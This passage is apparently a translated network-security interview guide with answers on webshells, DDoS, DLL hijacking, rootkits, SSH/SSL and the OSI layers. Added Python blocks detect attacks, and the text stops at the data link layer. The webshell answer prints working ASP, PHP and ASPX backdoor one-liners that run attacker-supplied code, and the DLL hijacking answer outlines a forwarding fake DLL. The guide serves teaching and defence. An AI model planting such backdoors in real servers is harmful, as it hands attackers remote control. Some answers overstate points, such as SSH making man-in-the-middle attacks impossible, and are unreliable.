Network Security, Web Security, Penetration Testing, Summary and Answers

The following are interview questions covering various aspects of network security. The more stars a question has, the more likely it is to come up. I hope all of you find a satisfactory job.

Note: This set of interview questions has been compiled into a PDF document, but the content is still being updated: no collection can cover every interview question, and it is hoped that more people will help fill in the gaps.

I have organized the interview questions and written-test questions into a PDF version for everyone to use. If you need it, you can get it at the end of the article.

1. What is WebShell?

2. What is Phishing?

3. What are the ways for you to acquire network security knowledge?

4. What is a CC attack?

5. How to check after the web server has been hacked?

6. What is the meaning of the dll file and what is its use? DLL hijacking principle

7. 0day vulnerability

8. What does Rootkit mean?

9. Honeypot

10. SSH

11. DDoS

12. Stuxnet virus

13. One Word Trojan Horse

14. The role of HTTPS

15. Tips for manually finding backdoor Trojan horses

16. Describe the seven-layer structure of OSI (Basic Reference Model for Open Systems Interconnection)

17. The difference between TCP and UDP

18. Shelling

19. "Human flesh search"

20. The basic principle of SYN Flood

21. What is a mobile phone "jailbreak"?

22. The host has been invaded; how would you deal with it? Self-examination approach

23. NAT (Network Address Translation) Protocol

24. Intranet penetration

25. Virtual Private Network

26. Layer 2 switch

27. Routing technology

28. Layer 3 switch

29. IPv6 address representation

1. What is WebShell?

A WebShell is a command execution environment that exists in the form of web page files such as ASP, PHP, JSP or CGI; it can also be called a web page backdoor. After invading a website, attackers usually mix these ASP or PHP backdoor files in with the normal web page files in the web directory of the server, and then use a browser to visit the backdoor and obtain a command execution environment, in order to control the web server (upload and download files, view the database, execute arbitrary program commands, etc.). Commonly used WebShells in China include the Haiyang ASP Trojan, Phpspy, c99shell, etc.

(Static web pages: the most common format is HTML. Most web pages are HTML, and the HTML family includes .htm, .dhtml, .xhtml, .shtm and .shtml. These are static pages, which contain no dynamic program code.

Dynamic web pages include ASP (based on JavaScript, VBScript or C#), JSP, PHP, ASPX, JSPX and CGI. These contain code executed by the server: before the server sends the page to the client, it first executes the dynamic language inside and sends the HTML generated by that execution to the client. So the source code we see on the client side is also HTML, because the dynamic code runs directly on the server and the server-side code is never displayed in the foreground.)

2. What is Phishing?

Phishing is an attack method in which large volumes of fraudulent spam purporting to be from a bank or other reputable institution are sent, with the intention of enticing recipients into giving up sensitive information such as usernames, passwords, account IDs, ATM PINs or credit card details.

The most typical phishing attack lures the recipient to a carefully designed phishing website that closely resembles the target organization's website, and collects the sensitive personal information the recipient enters there. Usually this attack process does not arouse the victim's suspicion.

It often directs users to enter personal data on fake websites whose URLs and interfaces look almost identical to the real website. Even with strong encrypted SSL server authentication, it is in practice very difficult to tell whether a website is fake. Phishing is an instance of using social engineering techniques to fool users. It relies on the poor usability (low affinity) of current cyber security technology.

3. What are the ways for you to acquire network security knowledge?

1. Websites: Kanxue, Security Focus, WooYun (Dark Clouds), FreeBuf

2. Video learning: iChunqiu, 51CTO, MOOC, Lab Building, Lab Bar, NetEase Cloud Classroom, etc.

3. WeChat official accounts, Zhihu, enterprise SRCs (security response centers), etc.

4. Books: "White Hats Talk about Web Security", "Authentic Guide to Web Application Security", etc.

5. Then, asking knowledgeable people

6. Finally, technology sharing within the company.

4. What is a CC attack?

I know only a little about this: it is a variant of DDoS in which normal-looking requests are forged until server resources are exhausted. The definition from Wikipedia: a CC attack is a type of DDoS (Distributed Denial of Service) attack, and compared with other DDoS attacks CC is somewhat more technical. You cannot see real source IPs or unusually large traffic in this kind of attack, yet the server becomes unable to serve connections normally. The principle of a CC attack is that the attacker controls a number of hosts which send a large number of requests to the target server without stopping, exhausting the server's resources until it crashes. CC is mainly used against web pages. Everyone has had the experience that a page visited by a large number of people opens slowly: CC simulates many users (one thread per user) endlessly accessing pages that require heavy data operations (that is, a lot of CPU time), so that server resources are wasted, the CPU stays at 100% for a long time and there are always endless pending connections, until the network is congested and normal access stops.
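As an added example that is not part of the original article, the following Python detects the pattern described above (one client endlessly requesting CPU-expensive pages) by counting per-IP requests to such pages inside a sliding time window over constructed access-log lines; the expensive paths, threshold and window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Common Log Format: ip ident user [timestamp] "METHOD path HTTP/x" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return (ip, timestamp, path-without-query) or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["path"].split("?", 1)[0]


def detect_cc(lines, expensive_paths, window=timedelta(seconds=10), threshold=50):
    """Sliding-window count of requests per IP to CPU-expensive pages.

    Lines are assumed to be in chronological order (normal log order).
    Returns {ip: peak count within any window} for IPs that reached the threshold.
    """
    recent = defaultdict(deque)
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, path = parsed
        if path not in expensive_paths:
            continue
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:   # drop requests older than the window
            q.popleft()
        if len(q) >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged


def constructed_log():
    """Constructed sample: normal browsing plus one client hammering /search.php."""
    lines = [
        '203.0.113.9 - - [10/Oct/2023:13:55:30 +0000] "GET /index.html HTTP/1.1" 200 512',
        '203.0.113.9 - - [10/Oct/2023:13:55:31 +0000] "GET /search.php?q=ssh HTTP/1.1" 200 9123',
        '203.0.113.9 - - [10/Oct/2023:13:55:33 +0000] "GET /search.php?q=tls HTTP/1.1" 200 8870',
        'garbage line that does not parse',
    ]
    # 120 expensive requests from one IP spread over 5 seconds (25 per second)
    lines += [
        f'198.51.100.4 - - [10/Oct/2023:13:55:{36 + i // 25:02d} +0000] '
        f'"GET /search.php?q={i} HTTP/1.1" 200 9123'
        for i in range(120)
    ]
    return lines


if __name__ == "__main__":
    print(detect_cc(constructed_log(), {"/search.php"}))   # {'198.51.100.4': 120}
```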

5. How to check after the web server has been hacked?

The simplest approach: 1. check the web server host; 2. check whether any abnormal ports are open; 3. use server security software such as Security Dog to clean up.

6. What is the meaning of the dll file and what is its use?

DLL (Dynamic Link Library) files, that is, dynamic link libraries, are also called application extensions.

Windows applications are designed modularly: not every application contains all of its function code itself; instead it calls the DLL providing the corresponding function while running, and functions that are not needed are never loaded. This greatly speeds up program loading and improves efficiency; other applications can call the same DLLs, which promotes code reuse and efficient memory use and reduces resource consumption; and when the program is updated, only the relevant DLL needs updating.

Note that some viruses also disguise themselves as DLL files and replace the system's DLL files, which is something to guard against.

DLL hijacking principle

Because the import table contains only the DLL's name and not its path, the loader must search for the DLL file on disk. It first tries to load the DLL from the directory where the current program is located; if it is not found there, it searches the Windows system directory, and finally each directory listed in the PATH environment variable. Using this feature, a forged DLL with the same name as a system DLL is created, providing the same export table, with each exported function forwarding to the real system DLL. When the program calls the system DLL, it first calls the forged DLL in the current directory, which performs its own work and then jumps to the function of the same name in the system DLL. This process is vividly described by one word: the system DLL has been hijacked.

After the fake DLL is made, it is placed in the program's current directory, so that when the original program calls the original function it is the same-named function of the fake DLL that runs: execution enters the hijacked DLL's code, which after its own processing calls the function of the original DLL.

How to Prevent DLL Hijacking

DLL hijacking exploits the system's search order for DLLs whose location is not specified, so that the program loads a same-named DLL from the current directory instead of the system one. The defence is therefore to tell the program where the system DLL lives, changing the load order so that the system DLL is not sought in the current directory but loaded directly from the system directory.
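As an added example that is not part of the original article, the following Python models the search order described above (application directory, then system directory, then PATH) against a constructed directory layout: it shows the planted copy winning under that order, the fully qualified load being unaffected, and the audit check a defender runs, listing DLLs in the application directory that shadow a system DLL's name. It is a simplified model, not the Windows loader, and "version.dll" is just a constructed file name.

```python
import os
import tempfile


def legacy_search_order(app_dir, system_dir, path_dirs):
    """Simplified model of the load order described above: application directory,
    then the system directory, then each PATH entry (the real loader has more steps)."""
    return [app_dir, system_dir, *path_dirs]


def resolve_dll(name, search_dirs):
    """Return the first file called `name` along the search order, or None."""
    for directory in search_dirs:
        candidate = os.path.join(directory, name)
        if os.path.isfile(candidate):
            return candidate
    return None


def shadowing_dlls(app_dir, system_dir):
    """Audit check: DLLs in the application directory that share a name with a
    system DLL and would therefore be loaded in its place under the legacy order."""
    system_names = {f.lower() for f in os.listdir(system_dir) if f.lower().endswith(".dll")}
    return sorted(f for f in os.listdir(app_dir) if f.lower() in system_names)


def demo():
    """Constructed layout: a planted 'version.dll' next to the program shadows the real one."""
    root = tempfile.mkdtemp()
    app_dir, system_dir = os.path.join(root, "app"), os.path.join(root, "system32")
    os.makedirs(app_dir)
    os.makedirs(system_dir)
    for name in ("version.dll", "kernel32.dll"):        # stand-ins for genuine system DLLs
        with open(os.path.join(system_dir, name), "w") as f:
            f.write("genuine")
    with open(os.path.join(app_dir, "version.dll"), "w") as f:   # planted same-name copy
        f.write("planted")
    unsafe = resolve_dll("version.dll", legacy_search_order(app_dir, system_dir, []))
    safe = resolve_dll("version.dll", [system_dir])   # fully qualified: no search, no hijack
    return {
        "unsafe_loaded_from": os.path.basename(os.path.dirname(unsafe)),
        "safe_loaded_from": os.path.basename(os.path.dirname(safe)),
        "shadowed": shadowing_dlls(app_dir, system_dir),
    }


if __name__ == "__main__":
    print(demo())
```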

7.0day vulnerability

It is a vulnerability that has been discovered but has not yet been officially patched.

0-Day in the sense of information security refers to vulnerability information that is known and mastered before security patches are released.

8. What does Rootkit mean?

Rootkits are a special type of malware (malicious software). Rootkits are special because you don't know what they're doing. Rootkits are basically undetectable, and it's nearly impossible to remove them. While detection tools continue to proliferate, malware authors are constantly finding new ways to cover their tracks.

The purpose of a rootkit is to hide itself and other software from detection. It does this by preventing users from identifying and removing the attacker's software. Rootkits can hide almost any software, including file servers, keyloggers, botnets, and remailers. Many rootkits can even hide large collections of files and allow an attacker to keep many files on your computer without you being able to see them.

Rootkits themselves do not affect the operation of your computer like viruses or worms. An attacker can identify existing vulnerabilities on the target system. Vulnerabilities may include: open network ports, unpatched systems, or systems with weak administrator passwords. After gaining access to a vulnerable system, an attacker can manually install a rootkit. This type of sneaky attack usually doesn't trigger automatically enforced network security controls, such as intrusion detection systems.

Finding rootkits can be difficult. There are some software packages that can detect rootkits. These packages can be divided into two categories: signature-based checkers and behavior-based checkers. Signature (signature)-based checkers, such as most virus scanners, check binaries for known rootkits. Behavior-based checkers try to find rootkits by looking for some hidden elements that represent their main behaviors. A popular behavior-based rootkit checker is Rootkit Revealer.

After a rootkit is discovered, the remedial measures available are also relatively limited. Because rootkits hide themselves, you may not know how long one has been on your system, nor what information it has already compromised. The best response to a found rootkit is to wipe and reinstall the system. While this is harsh, it is the only proven way to completely remove a rootkit.

Preventing rootkits from entering your system is the best thing you can do. To accomplish this, use the same defense-in-depth strategy you use to protect against any malware that targets your computer. Elements of defense in depth include: virus scanners, regular software updates, firewalls on hosts and networks, and strong password policies.

9. Honeypot

A honeypot is like an intelligence-gathering system: it is deliberately set up as a target to entice attackers. After an attacker breaks in, you can learn how he succeeded and keep abreast of the latest attacks and vulnerabilities aimed at the server. It is also possible to collect the tools attackers use and to map their social networks by eavesdropping on the connections between them.

10. SSH

SSH is the abbreviation of Secure Shell, developed by the Network Working Group of IETF; SSH is a security protocol based on the application layer. SSH is currently the most reliable protocol designed to provide security for remote login sessions and other network services. Using the SSH protocol can effectively prevent information leakage in the remote management process. SSH was originally a program on UNIX systems, and then quickly expanded to other operating platforms. SSH, when used correctly, closes holes in the network. SSH clients are available for a variety of platforms. Almost all UNIX platforms—including HP-UX, Linux, AIX, Solaris, Digital UNIX, Irix, and others—can run SSH.

Traditional network service programs such as FTP, POP and Telnet are inherently insecure, because they transmit passwords and data in clear text on the network, and people with ulterior motives can easily intercept them. Moreover, the security verification methods of these programs have their own weakness: they are easily attacked by the "man-in-the-middle" method. In a "man-in-the-middle" attack, the "man in the middle" pretends to be the real server to receive the data you send to the server, and then pretends to be you to send the data on to the real server. Once the data exchanged between you and the server has changed hands through the "middleman", serious problems arise. By using SSH, you can encrypt all transmitted data, so that "man-in-the-middle" attacks become impossible, and it also prevents DNS spoofing and IP spoofing. An additional benefit of SSH is that the transmitted data is compressed, which can speed up transmission. SSH has many functions: it can replace Telnet and provide a secure "channel" for FTP, POP and even PPP.


SSH consists of client and server software, and there are two incompatible versions: 1.x and 2.x. A client using SSH 2.x cannot connect to an SSH 1.x server; OpenSSH 2.x supports both SSH 1.x and 2.x.

How SSH security verification works: from the client's point of view, SSH provides two levels of security verification.

The first level (password-based verification): as long as you know your account and password, you can log in to the remote host. All transmitted data is encrypted, but there is no guarantee that the server you are connecting to is the one you intended to connect to; another server may be impersonating the real one, that is, a "man-in-the-middle" attack.

The second level (key-based verification) relies on keys: you must create a key pair for yourself and place the public key on the server you need to access. When you connect to the SSH server, the client software sends the server a verification request carrying your key. The server first looks for your public key in your home directory on the server and compares it with the public key you sent. If the two match, the server encrypts a "challenge" with the public key and sends it to the client; the client decrypts the challenge with your private key and sends the result back to the server. For this you must know the passphrase for your own key, but unlike the first level, no password is transmitted over the network. The second level not only encrypts all transmitted data; "man-in-the-middle" attacks are also impossible, because the attacker does not have your private key. The whole login process may, however, take 10 seconds.

SSL (Secure Sockets Layer, and its successor Transport Layer Security, TLS) is designed to secure web transport (HTTP, giving HTTPS) and in fact other protocols such as SMTP and NNTP as well; SSH (Secure Shell) is designed more as a transport protocol to secure Telnet/FTP, and by default it uses port 22.

Taking SSL as an example, basically the position of SSL in the transmission process is as follows:

---------
| HTTP  |
---------
|  SSL  |
---------
|  TCP  |
---------
|  IP   |
---------

If the SSL protocol is used to access the webpage, the steps are as follows:

User: Enter https://www.sslserver.com in the address bar of the browser

HTTP layer: translate the user's request into an HTTP request, such as

GET /index.htm HTTP/1.1
Host: www.sslserver.com

SSL layer: securely negotiate an encryption key through the channel of the lower layer protocol, and use this key to encrypt HTTP requests.

TCP layer: establish a connection with port 443 of the web server, and transmit data processed by SSL.

The receiving end is the reverse of this process.

SSL establishes an encrypted channel on top of TCP, and the data passing through this layer is encrypted, thus achieving the effect of confidentiality.

The SSL protocol is divided into two parts: Handshake Protocol and Record Protocol. Among them, the Handshake Protocol is used to negotiate the key, and most of the content of the protocol is how the communicating parties use it to securely negotiate a key. Record Protocol defines the format of transmission.
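The Record Protocol / Handshake Protocol split above, as an added example that is not part of the original article: it builds a TLS 1.2 ClientHello for www.sslserver.com (the host used in the steps above) inside a Record Layer header and parses it back, so that the fields a passive observer can read before any key exists (versions, offered cipher suites, server name) are explicit. The bytes are constructed here, standard library only; the three cipher-suite identifiers carry their standard IANA names.

```python
import os
import struct

# TLS constants (RFC 5246): record content type, handshake message type, extension id
CONTENT_HANDSHAKE = 0x16
HANDSHAKE_CLIENT_HELLO = 0x01
EXT_SERVER_NAME = 0x0000

# Names for the identifiers used in the sample (standard IANA registry names)
CIPHER_NAMES = {
    0xC02F: "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
    0xC030: "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
    0x000A: "TLS_RSA_WITH_3DES_EDE_CBC_SHA",   # legacy suite, weak by today's standards
}


def build_client_hello(server_name, cipher_suites, client_random=None):
    """Construct a TLS 1.2 ClientHello wrapped in a Record Layer header (constructed sample)."""
    client_random = client_random or os.urandom(32)
    suites = b"".join(struct.pack("!H", s) for s in cipher_suites)
    host = server_name.encode("ascii")
    # server_name extension: ServerNameList { name_type=0 (host_name), HostName }
    sni_entry = struct.pack("!BH", 0, len(host)) + host
    sni_ext = (struct.pack("!HH", EXT_SERVER_NAME, len(sni_entry) + 2)
               + struct.pack("!H", len(sni_entry)) + sni_entry)
    body = (
        b"\x03\x03"                                   # client_version: TLS 1.2
        + client_random                               # 32-byte client random
        + b"\x00"                                     # empty session id
        + struct.pack("!H", len(suites)) + suites     # offered cipher suites
        + b"\x01\x00"                                 # one compression method: null
        + struct.pack("!H", len(sni_ext)) + sni_ext   # extensions
    )
    handshake = struct.pack("!B", HANDSHAKE_CLIENT_HELLO) + len(body).to_bytes(3, "big") + body
    # Record Protocol header: type, legacy record version, length of the handshake message
    return struct.pack("!BHH", CONTENT_HANDSHAKE, 0x0301, len(handshake)) + handshake


def parse_client_hello(data):
    """Split a record into its Record Layer header and Handshake Protocol fields."""
    ctype, rec_version, rec_len = struct.unpack("!BHH", data[:5])
    if ctype != CONTENT_HANDSHAKE or len(data) < 5 + rec_len:
        raise ValueError("not a complete handshake record")
    hs = data[5:5 + rec_len]
    hs_type, hs_len = hs[0], int.from_bytes(hs[1:4], "big")
    if hs_type != HANDSHAKE_CLIENT_HELLO or hs_len != len(hs) - 4:
        raise ValueError("not a ClientHello or length mismatch")
    p = 4
    client_version = struct.unpack("!H", hs[p:p + 2])[0]; p += 2
    client_random = hs[p:p + 32]; p += 32
    sid_len = hs[p]; p += 1 + sid_len
    suites_len = struct.unpack("!H", hs[p:p + 2])[0]; p += 2
    suites = [struct.unpack("!H", hs[i:i + 2])[0] for i in range(p, p + suites_len, 2)]
    p += suites_len
    comp_len = hs[p]; p += 1 + comp_len
    server_name = None
    if p < len(hs):                                   # extensions are optional
        ext_len = struct.unpack("!H", hs[p:p + 2])[0]; p += 2
        end = p + ext_len
        while p < end:
            etype, elen = struct.unpack("!HH", hs[p:p + 4]); p += 4
            if etype == EXT_SERVER_NAME:
                # skip ServerNameList length (2) and name_type (1), then read the host name
                name_len = struct.unpack("!H", hs[p + 3:p + 5])[0]
                server_name = hs[p + 5:p + 5 + name_len].decode("ascii")
            p += elen
    return {
        "record_version": rec_version,
        "client_version": client_version,
        "client_random": client_random,
        "cipher_suites": [CIPHER_NAMES.get(s, hex(s)) for s in suites],
        "server_name": server_name,
    }


def weak_suites_offered(parsed):
    """Inspection use: legacy suites in the offer, which is plaintext and visible on the wire."""
    return [s for s in parsed["cipher_suites"] if "3DES" in s or "RC4" in s]


if __name__ == "__main__":
    hello = build_client_hello("www.sslserver.com", [0xC02F, 0xC030, 0x000A])
    print(parse_client_hello(hello))
```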

11. DDoS

http://baike.baidu.com/link?url=hOeNhuaIj6tF9NY1wr2wbe9pIe52PaCJ5KXTisdfPUK4j8beTktmVsRaH5hRjkcpq6FPouzRl2hbsbpEDO5HRAUYi_D1Tsnu_q7in59xRasqHbmi1oYhEyVDVVn9ZcIcqRsZi5axo_HgkXBPioJx_#10

A Distributed Denial of Service (DDoS) attack uses client/server technology to combine multiple computers into an attack platform and launch denial of service attacks on one or more targets, thereby multiplying the power of the attack. Usually the attacker uses a stolen account to install the DDoS master program on one computer. At a set time, the master program communicates with a large number of agent programs that have been installed on many computers on the network; the agents launch the attack when instructed to. Using client/server technology, the master program can activate hundreds of thousands of agents within seconds.

12. Stuxnet virus

Stuxnet is a worm, the first "worm" virus to specifically target real-world infrastructure (energy) facilities such as nuclear power plants, dams and national power grids. As soon as an operator inserts an infected USB drive into the computer's USB port, the virus takes control of certain industrial computer systems without anyone noticing (no further operation is required and no prompt appears).

Unlike traditional computer viruses, "Stuxnet" does not steal personal private information for profit, and it needs no Internet connection to propagate. The virus can disrupt the core production-control software used by chemical, power generation and power transmission companies around the world and take over other computers in the plant, "calling the shots" on them. It is highly destructive. The "Stuxnet" code is very sophisticated and has two main functions: one is to make Iran's centrifuges run out of control; the other is to induce misjudgment in decision-making.

13. One Word Trojan Horse

ASP one-word Trojan horse:

   <%execute(request("value"))%>

PHP one-word Trojan horse:

   <?php @eval($_POST[value]);?>

Variant: <?php $x=$_GET['z'];@eval("$x;");?>

ASPX one-word Trojan horse:

  <%@ Page Language="Jscript"%>

  <%eval(Request.Item["value"])%>
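A defender's counterpart to the one-word Trojans shown above, added here and not part of the original article: a small scanner that walks a web root and flags files in which a code-execution primitive is fed straight from a request parameter. The rules are constructed to cover the samples above (plus the $_POST form) and are not a full webshell rule set; the temporary web root is constructed inline.

```python
import re
import tempfile
from pathlib import Path

# Signatures for the "one word" backdoors quoted above: a code-execution
# primitive (eval/execute/assert) fed straight from a request parameter.
# Constructed for this example; production scanners carry far larger rule sets.
RULES = [
    ("php_eval_request",
     re.compile(r"\b(?:eval|assert)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I)),
    ("php_eval_via_variable",   # $x=$_GET['z']; @eval("$x;");
     re.compile(r"\$(\w+)\s*=\s*\$_(?:POST|GET|REQUEST|COOKIE)\b[^;]*;\s*@?eval\s*\(\s*[\"']?\$\1\b",
                re.I | re.S)),
    ("asp_execute_request",
     re.compile(r"\bexecute\s*\(\s*request\s*\(", re.I)),
    ("aspx_eval_request",
     re.compile(r"\beval\s*\(\s*Request(?:\.Item)?\s*[\[(]", re.I)),
]
SCAN_SUFFIXES = {".php", ".phtml", ".asp", ".aspx", ".jsp", ".cgi"}


def scan_text(text):
    """Return the names of all rules matching the given source text."""
    return [name for name, rx in RULES if rx.search(text)]


def scan_webroot(root):
    """Walk a web root; return {relative path: [rule names]} for files that match."""
    root = Path(root)
    hits = {}
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        matched = scan_text(text)
        if matched:
            hits[path.relative_to(root).as_posix()] = matched
    return hits


def demo():
    """Constructed web root: three planted backdoors next to a harmless page."""
    root = Path(tempfile.mkdtemp())
    (root / "images").mkdir()
    files = {
        "index.php": "<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>",   # benign
        "images/cache.php": "<?php $x=$_GET['z'];@eval(\"$x;\");?>",
        "conn.asp": "<%execute(request(\"value\"))%>",
        "up.aspx": "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"value\"])%>",
        "style.css": "eval(Request.Item['x'])",   # non-script suffix: not scanned
    }
    for name, body in files.items():
        (root / name).write_text(body)
    return scan_webroot(root)


if __name__ == "__main__":
    for path, rules in sorted(demo().items()):
        print(path, rules)
```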

14. The role of HTTPS

Content encryption establishes an information security channel to ensure the security of data transmission;

Authentication confirms the authenticity of the website

Data integrity prevents content from being impersonated or tampered with by a third party

The difference between HTTPS and HTTP

The https protocol needs to apply for a certificate from a CA.

HTTP is the Hypertext Transfer Protocol, and its information is transmitted in plain text; HTTPS is a secure, SSL-encrypted transfer protocol.

http and https use completely different connection methods and different ports. The former is 80 and the latter is 443.

An HTTP connection is very simple and stateless; HTTPS is a network protocol built from SSL + HTTP that performs encrypted transmission and identity authentication, and is safer than HTTP.

15. Tips for manually finding backdoor Trojan horses

1. First and most important, pay attention to the system's startup items. Enter "msconfig" in "Run" to open the System Configuration utility and check the startup list; also pay attention to the services. It is also recommended to use the boot-acceleration function of 360 Security Guard to check for abnormal startup items and service items, because 99% of backdoor Trojans register themselves as system services in order to start automatically at boot. If a suspicious item is found, open its path directly, locate the program file, delete it and prohibit it from starting automatically;

2. Check the system's key directory system32 and the files under the Windows installation directory. Under Windows XP the default paths are C:\WINDOWS\system32 and C:\WINDOWS\ respectively. Look at recently modified files and check whether there are any suspicious executable or DLL files among them. These two places are the favourite hiding places of Trojans (small tip: be sure to set the folder options to display all files).

3. Observe whether there is anything abnormal in the network connections: "Run" - "cmd" - "netstat -an" to check for suspicious or abnormal connections. If you are not very familiar with computers, the traffic-monitoring function of 360 is more intuitive and convenient. Pay special attention to the remote port of each connection: if there is a port such as 8000, take note, since 8000 is the default port of Gray Pigeon. I remember finding port 8000 among the network connections during a backdoor Trojan test. Of course, the absence of a connection on port 8000 does not mean the machine is safe, because 8000 is only Gray Pigeon's default port for calling home, and the port can be changed.

Through the above methods you can find some suspicious files on the computer; if you are sure about them you can delete them manually, or you can use anti-virus software. If you really have been hit by a backdoor Trojan, don't panic: the best and most thorough method is to reinstall the system and then scan in safe mode with anti-virus software using the latest virus database.
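The netstat check in step 3, as an added example that is not part of the original article: it parses constructed "netstat -an" output (Windows layout) and flags established connections to non-LAN addresses on the Gray Pigeon default port 8000 and, because the article notes the port can be changed, on any other remote port outside a short list of common services. The 203.0.113.x and 198.51.100.x addresses are documentation ranges standing in for external hosts; the port lists are assumptions.

```python
import ipaddress

# Constructed sample of "netstat -an" output on Windows (not a real capture)
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    192.168.1.5:49731      203.0.113.7:8000       ESTABLISHED
  TCP    192.168.1.5:49744      198.51.100.2:443       ESTABLISHED
  TCP    192.168.1.5:49750      192.168.1.20:445       ESTABLISHED
  TCP    192.168.1.5:49760      203.0.113.7:6667       ESTABLISHED
  UDP    0.0.0.0:5353           *:*
"""

# 8000 is the Gray Pigeon default named in the article; the "common" set is an
# assumption for what ordinary outbound traffic from a workstation looks like.
WATCHLIST_PORTS = {8000}
COMMON_REMOTE_PORTS = {80, 443, 445, 53, 22, 25, 587, 993, 995}

# Addresses that are local to the LAN and therefore not "calling home" targets
LAN_NETS = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def parse_netstat(text):
    """Return (proto, local_ip, local_port, remote_ip, remote_port, state) per row."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("TCP", "UDP"):
            continue
        proto, local, remote = parts[0], parts[1], parts[2]
        state = parts[3] if len(parts) > 3 else ""
        lip, lport = local.rsplit(":", 1)
        rip, rport = remote.rsplit(":", 1)
        rows.append((proto, lip, lport, rip, rport, state))
    return rows


def is_lan(ip):
    """True for private/loopback/link-local peers and for placeholders such as '*'."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return True
    return any(addr in net for net in LAN_NETS)


def suspicious_connections(text):
    """Flag ESTABLISHED TCP connections to external hosts on watchlisted or unusual ports."""
    findings = []
    for proto, lip, lport, rip, rport, state in parse_netstat(text):
        if proto != "TCP" or state != "ESTABLISHED" or is_lan(rip):
            continue
        port = int(rport)
        if port in WATCHLIST_PORTS:
            findings.append((rip, port, "watchlist port (Gray Pigeon default)"))
        elif port not in COMMON_REMOTE_PORTS:
            findings.append((rip, port, "unusual remote port"))
    return findings


if __name__ == "__main__":
    for rip, port, reason in suspicious_connections(SAMPLE_NETSTAT):
        print(f"{rip}:{port}  {reason}")
```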

16. Describe the seven-layer structure of OSI (Basic Reference Model for Open Systems Interconnection)

The advantage of layering is that, with a layered structure, the information exchange problem of an open system can be decomposed into a series of easily controlled software and hardware modules (layers), and each layer can be independently modified or extended as needed. This also facilitates the interconnection of equipment from different manufacturers and helps everyone learn and understand data communication networks.

Different layers in the OSI reference model perform different functions, and each layer cooperates with each other to communicate through standard interfaces.

Layer 7, Application Layer: the highest layer in OSI. It provides access to the OSI environment for particular kinds of network applications. The application layer determines the nature of communication between processes to meet the user's needs. It not only provides the information exchange and remote operations required by application processes, but also acts as the user agent of the application process, completing functions necessary for information exchange. It includes protocols such as file transfer, access and management (FTAM), virtual terminal (VT), transaction processing (TP), remote database access (RDA), manufacturing message specification (MMS) and directory service (DS); the application layer communicates with the application interface so that information can be presented to the user. Common protocols here are HTTP, HTTPS, FTP, TELNET, SSH, SMTP, POP3, etc.

Layer 6 presentation layer: mainly used to deal with the representation of information exchanged in two communication systems. Solve the grammar problem of user information for upper-level users. It includes data format exchange, data encryption and decryption, data compression and terminal type conversion.

Layer 5 Session Layer: Establishes a peer connection between two nodes. Provides a dialogue control mechanism between applications in the end system. This service includes setting whether to establish a connection in full-duplex or half-duplex mode, although duplex mode can be handled in layer 4; the session layer manages the login and logout process. It specifically manages the conversation between two users and processes. If only one user is allowed to perform a specific operation at a time, the session layer protocol will manage these operations, such as preventing two users from updating the same set of data in the database at the same time.

Layer 4, Transport Layer: general data delivery, connection-oriented or connectionless. It provides session-layer users with an end-to-end reliable, transparent and optimised data transfer mechanism, including full-duplex or half-duplex operation, flow control and error recovery. The transport layer divides messages into packets and reassembles them at the receiving end; different packets can be sent to the host over different connections, so that higher bandwidth is obtained without affecting the session layer. When establishing a connection, the transport layer can request a quality of service, which specifies the acceptable bit error rate, delay, security and other parameters, and it can also implement end-to-end flow control.

Layer 3, Network Layer: this layer establishes the connection between two nodes through addressing, selects the appropriate route and switching nodes for the packets handed down by the transport layer at the source, and delivers them correctly, according to the address, to the transport layer at the destination. It includes routing and relaying data through the interconnected network; in addition to selecting routes, the network layer is also responsible for establishing and maintaining connections, controlling congestion on the network, and generating billing information when necessary.

Layer 2 Data Link Layer: Data is framed at this layer and flow control is handled. Shield the physical layer, provide a data link connection for the network layer, and perform almost error-free data transmission (error control) on a physical connection that may have errors. This layer specifies the topology and provides hardware addressing. Commonly used devices include network cards, bridges, and switches;

Layer 1 physical layer: at the bottom of the OSI reference model. The main function of the physical layer is to use the physical transmission medium to provide a physical connection for the data link layer in order to transmit the bit stream transparently. Commonly used devices are (various physical devices) hubs, repeaters, modems, network cables, twisted pair cables, and coaxial cables.

When data is sent, it is passed from the seventh layer to the first layer, and the reverse is true for receiving data.

The upper three layers are collectively called the application layer and are used to control the software aspect. The next four layers are collectively referred to as the data flow layer and are used to manage the hardware. All layers except the physical layer are implemented in software.

Data will be split when sent to the data stream layer.

The data unit at the transport layer is called a segment, at the network layer a packet, at the data link layer a frame, and at the physical layer a bit stream. Each of these is called a PDU (protocol data unit).

Functions of each layer

(1) Physical Layer

The physical layer is the lowest layer of the OSI reference model, which uses the transmission medium to provide a physical connection for the data link layer. It is primarily concerned with transmitting bit streams from one node to another over a physical link, which may be copper wire, satellite, microwave, or some other communication medium. The questions it cares about are: How many volts represent 1? How many volts represent 0? What is the clock rate? Full-duplex or half-duplex transmission? In general the physical layer is concerned with the mechanical, electrical, functional and procedural characteristics of the link.

(2) Data Link Layer

